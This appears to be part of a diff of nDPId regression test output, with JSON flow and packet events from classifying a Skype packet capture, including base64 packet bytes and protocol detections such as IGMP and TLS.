+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2953,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":2,"flow_last_seen":1431969771918,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969771918,"pkt":"PBXCt3IO0NQSxnP1CABFAABA2bNAAHIGrGQF+LrdwKgBInkiw9s0p7etaKF2ibASRBBmywAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2954,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":3,"flow_last_seen":1431969771919,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969771919,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0HKZAAEAGm37AqAEiBfi63cPbeSJooXaJNKe3roAQECwaugAAAQEICj4kgpQAAAAA"} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2956,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":2,"flow_last_seen":1431969772021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969772021,"pkt":"PBXCt3IO0NQSxnP1CABFAABAALFAAHMG9YNH7gfLwKgBIklPw9pIXx9TLhUMZrAS\/\/91HgAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2957,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":3,"flow_last_seen":1431969772021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969772021,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0TOFAAEAG3F\/AqAEiR+4Hy8PaSU8uFQxmSF8fVIAQECzklgAAAQEICj4kgvoAAAAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3013,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969774806,"flow_last_seen":1431969774806,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969774806,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50140,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3013,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":1431969774806,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969774806,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwnFAAEAGyM7AqAEiTKehBsPcTzIA95PqAAAAALAC\/\/8TqQAAAgQFtAEDAwUBAQgKPiSNxwAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3061,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":2,"flow_last_seen":1431969776480,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969776480,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAAC4GnURMp6EGwKgBIk8yw9wNTHkCAPeT66AScSCe6QAAAgQFrAQCCAq+oc+oPiSNxwEDAwc="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3062,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":3,"flow_last_seen":1431969776480,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969776480,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo01NAAEAGuATAqAEiTKehBsPcTzIA95PrAAAAAFAEAABYdwAA"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3107,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969783628,"flow_last_seen":1431969783628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969783628,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50141,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3107,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":1431969783628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969783628,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJsBAAEAG06bAqAEiUA4uecPdET\/5wLoiAAAAALAC\/\/9\/YwAAAgQFtAEDAwUBAQgKPiSwIwAAAAAEAgAA"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3108,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":2,"flow_last_seen":1431969783723,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969783723,"pkt":"PBXCt3IO0NQSxnP1CABFAABAoepAAHQGJHxQDi55wKgBIhE\/w92tjxb3+cC6I7AS\/\/+oHwAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3109,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":3,"flow_last_seen":1431969783723,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969783723,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0sYlAAEAGSOnAqAEiUA4uecPdET\/5wLojrY8W+IAQECzqDwAAAQEICj4ksIIAAAAA"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3119,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969784741,"flow_last_seen":1431969784741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969784741,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50142,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3119,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":1431969784741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969784741,"pkt":"0NQSxnP1PBXCt3IOCABFAABAOglAAEAGwF3AqAEiUA4uecPeET+tjIdjAAAAALAC\/\/\/6AAAAAgQFtAEDAwUBAQgKPiS0eAAAAAAEAgAA"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3120,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":2,"flow_last_seen":1431969784827,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969784827,"pkt":"PBXCt3IO0NQSxnP1CABFAABAogNAAHQGJGNQDi55wKgBIhE\/w94bo3ajrYyHZLAS\/\/9ZUgAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3121,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":3,"flow_last_seen":1431969784827,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969784827,"pkt":"0NQSxnP1PBXCt3IOCABFAAA03GtAAEAGHgfAqAEiUA4uecPeET+tjIdkG6N2pIAQECyW9gAAAQEICj4ktM4AAAAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3167,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969788719,"flow_last_seen":1431969788719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969788719,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50143,"dst_port":29059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3167,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":1,"flow_last_seen":1431969788719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969788719,"pkt":"0NQSxnP1PBXCt3IOCABFAABAtCpAAEAGk4XAqAEiTsric8PfcYPq0olRAAAAALAC\/\/+YTgAAAgQFtAEDAwUBAQgKPiTD+gAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3171,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":2,"flow_last_seen":1431969788813,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969788813,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8euxAAHMGmcdOyuJzwKgBInGDw984j2+76tKJUqASIAAVbgAAAgQFrAEDAwgEAggKAlDJPj4kw\/o="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3172,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":3,"flow_last_seen":1431969788813,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969788813,"pkt":"0NQSxnP1PBXCt3IOCABFAAA00tZAAEAGdOXAqAEiTsric8PfcYPq0olSOI9vvIAQECxTqwAAAQEICj4kxFYCUMk+"} 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3181,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1431969789358,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1431969789358,"pkt":"AQBeAAABoPPBbTu2CABG2AAgAAAAAAECgljAqAD+4AAAAZQEAAARZO6bAAAAAA=="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3185,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969789832,"flow_last_seen":1431969789832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969789832,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50144,"dst_port":29059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3185,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1431969789832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969789832,"pkt":"0NQSxnP1PBXCt3IOCABFAABAcbhAAEAG1ffAqAEiTsric8PgcYPYQ6AmAAAAALAC\/\/+PtQAAAgQFtAEDAwUBAQgKPiTITAAAAAAEAgAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3185,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969789832,"flow_last_seen":1431969789832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969789832,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50144,"dst_port":29059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3185,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1431969789832,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969789832,"pkt":"0NQSxnP1PBXCt3IOCABFAABAcbhAAEAG1ffAqAEiTsric8PgcYPYQ6AmAAAAALAC\/\/+PtQAAAgQFtAEDAwUBAQgKPiTITAAAAAAEAgAA"} 00539{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3186,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969789851,"flow_last_seen":1431969789851,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969789851,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3186,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":1431969789851,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1431969789851,"pkt":"AQBeAAD7PBXCt3IOCABGAAAgDOsAAAECdSfAqAEi4AAA+5QEAAAWAAkE4AAA+w=="} 00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3186,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969789851,"flow_last_seen":1431969789851,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969789851,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3187,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":2,"flow_last_seen":1431969789919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969789919,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8evFAAHMGmcJOyuJzwKgBInGDw+BU8I6O2EOgJ6ASIADRMgAAAgQFrAEDAwgEAggKAlDJrD4kyEw="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3188,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":3,"flow_last_seen":1431969789919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969789919,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0W4RAAEAG7DfAqAEiTsric8PgcYPYQ6AnVPCOj4AQECwPdQAAAQEICj4kyKMCUMms"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3221,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969791166,"flow_last_seen":1431969791166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969791166,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50145,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3221,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":1431969791166,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969791166,"pkt":"0NQSxnP1PBXCt3IOCABFAABA8JJAAEAGte\/AqAEinTg1M8PhMD4fbaHhAAAAALAC\/\/\/hugAAAgQFtAEDAwUBAQgKPiTNeQAAAAAEAgAA"} -00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969657367,"flow_last_seen":1431969678270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50033,"dst_port":40015,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969657367,"flow_last_seen":1431969678270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50033,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969657367,"flow_last_seen":1431969676525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50034,"dst_port":40033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969657367,"flow_last_seen":1431969676525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50034,"dst_port":40033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969675567,"flow_last_seen":1431969675716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969675567,"flow_last_seen":1431969675716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969678254,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969678254,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969658978,"flow_last_seen":1431969677390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":396,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969658978,"flow_last_seen":1431969677390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":396,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969791465,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":2,"flow_last_seen":1431969792168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969792168,"pkt":"0NQSxnP1PBXCt3IOCABFAABA6r1AAEAGu8TAqAEinTg1M8PhMD4fbaHhAAAAALAC\/\/\/d0gAAAgQFtAEDAwUBAQgKPiTRYQAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3227,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969792778,"flow_last_seen":1431969792778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969792778,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50146,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3227,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":1431969792778,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969792778,"pkt":"0NQSxnP1PBXCt3IOCABFAABACyhAAEAGm1rAqAEinTg1M8PiAbsrN9oxAAAAALAC\/\/\/F2QAAAgQFtAEDAwUBAQgKPiTTwgAAAAAEAgAA"} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3228,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":3,"flow_last_seen":1431969793170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969793170,"pkt":"0NQSxnP1PBXCt3IOCABFAABATYlAAEAGWPnAqAEinTg1M8PhMD4fbaHhAAAAALAC\/\/\/Z6gAAAgQFtAEDAwUBAQgKPiTVSQAAAAAEAgAA"} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3231,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":2,"flow_last_seen":1431969793781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969793781,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXRdAAEAGSWvAqAEinTg1M8PiAbsrN9oxAAAAALAC\/\/\/B8AAAAgQFtAEDAwUBAQgKPiTXqwAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3187,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":2,"flow_last_seen":1431969789919,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969789919,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8evFAAHMGmcJOyuJzwKgBInGDw+BU8I6O2EOgJ6ASIADRMgAAAgQFrAEDAwgEAggKAlDJrD4kyEw="} 